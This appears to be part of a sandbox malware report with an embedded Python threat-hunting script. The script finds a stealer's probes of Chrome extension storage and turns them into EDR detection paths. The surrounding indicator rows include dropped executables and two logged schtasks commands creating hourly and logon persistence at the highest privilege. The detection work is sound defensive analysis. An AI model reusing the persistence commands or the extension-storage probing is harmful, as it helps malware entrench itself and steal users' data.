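file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\Lzd-U--zeLf[1].js |
"""

# Chrome extension IDs are 32 characters drawn from a-p (a hex digest mapped onto
# the letters a..p).  The profile segment is optional because some probes sit
# directly under User Data.
PROBE = re.compile(
    r'\\Google\\Chrome\\User Data\\(?:(?P<profile>[^\\]+)\\)?'
    r'(?P<store>Local Extension Settings|Sync Extension Settings)\\'
    r'(?P<ext>[a-p]{32})\\CURRENT$'
)
# Folder names Chrome actually uses for profiles.
CHROME_PROFILE = re.compile(r'^(Default|Profile \d+|Guest Profile|System Profile)$')
ROOT = '<User Data root>'


def parse_probes(text):
    """Return (folder, store, extension_id) for each extension-storage probe."""
    probes = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split('|')]
        if len(parts) < 2 or parts[0] != 'file':
            continue
        m = PROBE.search(parts[1])
        if m:
            probes.append((m.group('profile') or ROOT, m.group('store'), m.group('ext')))
    return probes


def summarize(probes):
    """Target extension list plus the folders the walker touched, real and bogus."""
    ids_by_folder = defaultdict(set)
    for folder, _, ext in probes:
        ids_by_folder[folder].add(ext)
    return {
        'extension_ids': sorted({ext for _, _, ext in probes}),
        'folders': dict(ids_by_folder),
        # Probes in folders that cannot hold a profile expose a blind directory walk.
        'non_profile_folders': sorted(f for f in ids_by_folder if not CHROME_PROFILE.match(f)),
    }


def hunting_paths(summary):
    """Paths that only a directory-walking stealer would touch, for an EDR file-access rule."""
    return [rf'*\Google\Chrome\User Data\{f}\*Extension Settings\*\CURRENT'
            for f in summary['non_profile_folders'] if f != ROOT]


if __name__ == '__main__':
    s = summarize(parse_probes(SAMPLE_ROWS))
    print('targeted extensions:', len(s['extension_ids']))
    print('bogus profile folders:', s['non_profile_folders'])
    for p in hunting_paths(s):
        print('hunt:', p)
```

A file-access rule on those non-profile paths from any process other than chrome.exe has essentially no legitimate hits, which makes it a cleaner detector than the extension IDs themselves, since a later build of the stealer can change its target list but keeps the same lazy walker.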
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\Lzd-U--zeLf[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\xGzxHIbkRpC[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\0_HoU29ShlI[1].js |
file | C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe |
file | C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST |